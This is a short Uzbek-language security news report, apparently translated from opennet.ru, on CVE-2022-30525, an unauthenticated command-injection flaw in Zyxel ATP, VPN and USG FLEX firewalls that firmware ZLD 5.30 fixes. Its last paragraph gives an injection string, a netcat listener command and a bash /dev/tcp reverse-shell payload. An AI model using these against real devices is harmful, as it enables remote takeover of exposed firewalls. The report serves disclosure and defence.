ATP, VPN va USG FLEX seriyali Zyxel qurilmalarida muhim zaiflik (CVE-2022-30525) aniqlandi, ular korxonalarda xavfsizlik devori, IDS va VPN ishlashini tashkil qilish uchun mo‘ljallangan bo‘lib, tashqi tajovuzkorga tarmoqdagi kodni bajarishga imkon beradi. autentifikatsiyasiz foydalanuvchi huquqlariga ega bo'lmagan qurilma. Hujumni amalga oshirish uchun tajovuzkor HTTP/HTTPS protokoli yordamida qurilmaga so‘rov yuborish imkoniyatiga ega bo‘lishi kerak. Zyxel ZLD 5.30 proshivka yangilanishidagi zaiflikni tuzatdi. Shodan xizmati maʼlumotlariga koʻra, hozirda global tarmoqda HTTP/HTTPS orqali soʻrovlarni qabul qiluvchi 16213 ta potentsial zaif qurilmalar mavjud.
Operatsiya veb-ishlovchi /ztp/cgi-bin/handler-ga autentifikatsiyasiz kirish mumkin bo'lgan maxsus mo'ljallangan buyruqlarni yuborish orqali amalga oshiriladi. Muammo lib_wan_settings.py kutubxonasida ishlatiladigan va setWanPortSt operatsiyasini qayta ishlashda bajariladigan os.system chaqiruvidan foydalangan holda tizimda buyruqlarni bajarishda so'rov parametrlarini to'g'ri tozalashning yo'qligi bilan bog'liq.
Misol uchun, tajovuzkor satrni o'tkazishi mumkin "; ping 192.168.1.210;" bu tizimda "ping 192.168.1.210" buyrug'ining bajarilishiga olib keladi. Buyruqlar qobig'iga kirish uchun siz tizimingizda "nc -lvnp 1270" ni ishga tushirishingiz va so'ngra qurilmaga so'rov yuborish orqali teskari ulanishni boshlashingiz mumkin. bash -c \»exec bash -i &>/dev/tcp/192.168.1.210/1270 <&1;\»;’.
Manba: opennet.ru